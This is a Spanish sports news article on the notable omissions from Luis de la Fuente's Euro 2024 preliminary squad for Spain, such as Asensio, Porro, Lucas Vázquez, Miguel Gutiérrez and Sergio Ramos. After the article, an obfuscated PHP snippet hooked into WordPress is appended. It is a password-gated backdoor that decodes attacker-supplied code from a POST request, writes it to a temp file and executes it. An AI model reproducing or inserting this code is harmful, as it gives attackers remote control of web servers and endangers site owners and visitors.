Los grandes ausentes de la lista de Luis de la Fuente: Asensio, Porro, Lucas, Miguel Gutiérrez, Ramos….

El seleccionador repite solamente con 11 futbolistas en su prelista de 29 de los 24 que llevó su antecesor Luis Enrique al Mundial de Qatar.

Luis de la Fuente anunció los 29 integrantes de la prelista que se pelearán por los 26 puestos que viajarán Alemania para participar en la Eurocopa. El 7 de junio es la fecha límite para hacer llegar a la convocatoria definitiva a la UEFA. Con una prelista tan amplia, no son muchos los nombres que han quedado fuera pero sí que hay varios casos que destacan por encima del resto.

Las ausencias más destacadas pueden estar en la zona defensiva. Ha sorprendido el seleccionador dejando fuera a Pedro Porro (24 años). El defensa del Tottenham ha tenido un final de temporada a buen nivel y ya estuvo presente en la última lista para los amistosos de Colombia y Brasil. Línea similar se ha utilizado con Pau Torres (27 años). El central del Aston Villa ha salido de los elegidos. No fue nunca un fijo dentro de las preferencias de Luis de la Fuente, pero llama la atención su ausencia.

Igual de relevante o más es la ausencia del jugador del Real Madrid, Lucas Vázquez (32 años). El español estaba en boca de todos por el gran rendimiento en este final de temporada de los blancos. Lucas, habitual suplente de Carvajal, era uno de los preferidos de los lectores de As.com, aunque no iba con la Selección desde el Mundial de 2018. Su último tercio de la campaña bajo las órdenes de Ancelotti había desatado las esperanzas de Lucas de estar en Alemania.

Una de las grandes ausencias, principalmente porque ha estado casi siempre entre las preferencias del técnico es Oihan Sancet (24 años). El del Athletic se ha caído finalmente. Ya lo tenía difícil por la inclusión de Isco, pero la grave lesión del jugador del Betis le había vuelto a abrir la puerta…

Clamor por Miguel Gutiérrez

También hay cierta controversia por la baja de Miguel Gutiérrez (22 años). El lateral no ha debutado aún con La Roja, pero su gran campaña en el Girona había disparado la posibilidad de estrenarse con España en el escenario de un gran torneo. La lesión a última hora de Gayà (Valencia) le abría un hueco, pero finalmente Luis de la Fuente se ha decidido por Grimaldo (Leverkusen) y Cucurella (Chelsea). Su no presencia fue de las más comentadas en redes sociales y entre los seguidores más fieles de España. El lateral izquierdo se había ganado una oportunidad.

De los jugadores que estuvieron en el Mundial de Qatar de 2022 destaca principalmente una omisión en la lista para la Eurocopa: Marco Asensio (28 años). El balear no ha terminado de tener continuidad en el PSG por las lesiones y finalmente se ha caído de los elegidos. El seleccionador no quiso entrar en detalles de su ausencia: “Admiro a Asensio. Vamos a centrarnos en los que están aquí y poner valor en ellos”.

Como delanteros de área solamente están Morata y Joselu por lo que se esperaba otra atacante más puro. Las miradas estaban puestas en Gerard Moreno (32 años) y más cuando el del Villarreal regresó a una convocatoria en los amistosos de marzo. Finalmente no convenció a Luis de la Fuente y se cayó del campeonato de Europa.

El regreso de Isco hubiera sido uno de las grandes sorpresas, aunque Luis de la Fuente ya confirmó que le veía muy bien y su presencia estaba casi confirmada si no se hubiera lesionado (al igual que Gavi). Igual de sorprendente o más hubiera sido que Sergio Ramos (38 años) hubiese tenido posibilidad de ampliar sus 180 partidos con España. Desde marzo de 2021 no es internacional el defensa del Sevilla, pero su nombre siempre genera interés y él siempre está dispuesto a seguir vistiendo La Roja. El regreso de Ramos a la Selección española siempre es una incógnita y en esta ocasión también lo ha sido.

El cambio generacional en La Roja es evidente. De los 24 que llevó Luis Enrique a Qatar solamente repiten 11 en la lista de De la Fuente: Unai Simón, Raya, Carvajal, Laporte, Rodrigo, Marcos Llorente, Olmo, Morata, Ferran, Nico Williams y Pedri.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}